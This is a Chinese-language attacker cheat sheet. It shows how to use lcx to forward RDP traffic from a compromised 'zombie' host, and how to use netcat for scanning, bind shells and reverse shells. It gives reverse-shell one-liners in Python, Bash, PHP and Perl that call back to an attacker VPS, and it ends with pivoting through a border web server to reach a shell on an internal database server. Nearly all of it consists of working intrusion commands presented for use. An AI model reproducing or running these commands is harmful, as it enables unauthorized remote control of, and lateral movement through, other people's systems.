lcx用法:
lcx的Linux版本為portmap、
1.內網端口轉發
本機: lcx -listen 2222 3333
2222為轉發端口,3333為本機任意未被占用的端口
肉雞:lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 為本機IP,2222為轉發端口,127.0.0.1為肉雞內網IP,3389為遠程終端端口
3389連接時格式 127.0.0.1:3333
2. 本地端口映射
如果3389端口被防火牆禁用,那我們可以轉發到其他端口。如53
lcx -tran 53 本機ip地址 3389
netcat用法:
- 簡易使用
-
- 命令查詢
root@calm:~# nc -h
[v1.10-41.1+b1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data'). - Banner抓取
nc -nv 192.168.2.246 22 - 遠程連接主機
nc -nvv ip port
- 端口掃描
root@calm:~# nc -v 192.168.2.183 80
掃描指定端口段
WIN-7-webserver.lan [192.168.2.183] 80 (http) open
root@calm:~# nc -v -z 192.168.2.183 1-1000 - 端口監聽
nc -l -p port
- 文件傳輸
在本地監聽:
在另一台輸入:
-
簡易聊天
本地vps輸入:nc -l -p 999
目標機器輸入:nc -vn vps的ip 999
- 命令查詢
-
獲取shell
- 正向shell
nc -lvp 4444 -e /bin/sh lunux
nc -lvp 4444 -e c:\windows\system32\cmd.exe windows
vps執行:
nc 192.168.2.183 4444 - 反向shell
vps執行:
nc -lvp 4444
目標主機執行:
nc vps的ip 4444 -e /bin/sh lunux
nc vps的IP 4444 -e c:\windows\system32\cmd.exe windows
- 正向shell
- 目標機器沒有nc時候獲取反向shell
- Python反向shell
vps執行:nc -lvp 4444
目標主機執行:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.181",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' - Bash反向shell
vps執行:nc -lvp 4444
目標主機執行: bash -i >& /dev/tcp/192.168.2.181/4444 0>&1 - PHP反向shell
vps上執行:
nc -lvp 4444
目標主機執行:
php -r '$sock=fsockopen("192.168.2.181",4444);exec("/bin/sh -i <&3 >&3 2>&3");' - Perl反向Shell
vps執行:
nc -lvp 4444
目標機器執行:
perl -e 'use Socket;$i="192.168.2.181";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' - 內網代理
vps監聽:
nc -lvp 3333
數據庫服務器執行:
nv -lvp 3333 -e /bin/sh
在Web服務器(邊界服務器)執行:
nc -v 192.168.2.181 3333 -c "nc -v 數據庫內網ip 3333"
這樣可以用vps獲取內網數據庫主機的shell。
- Python反向shell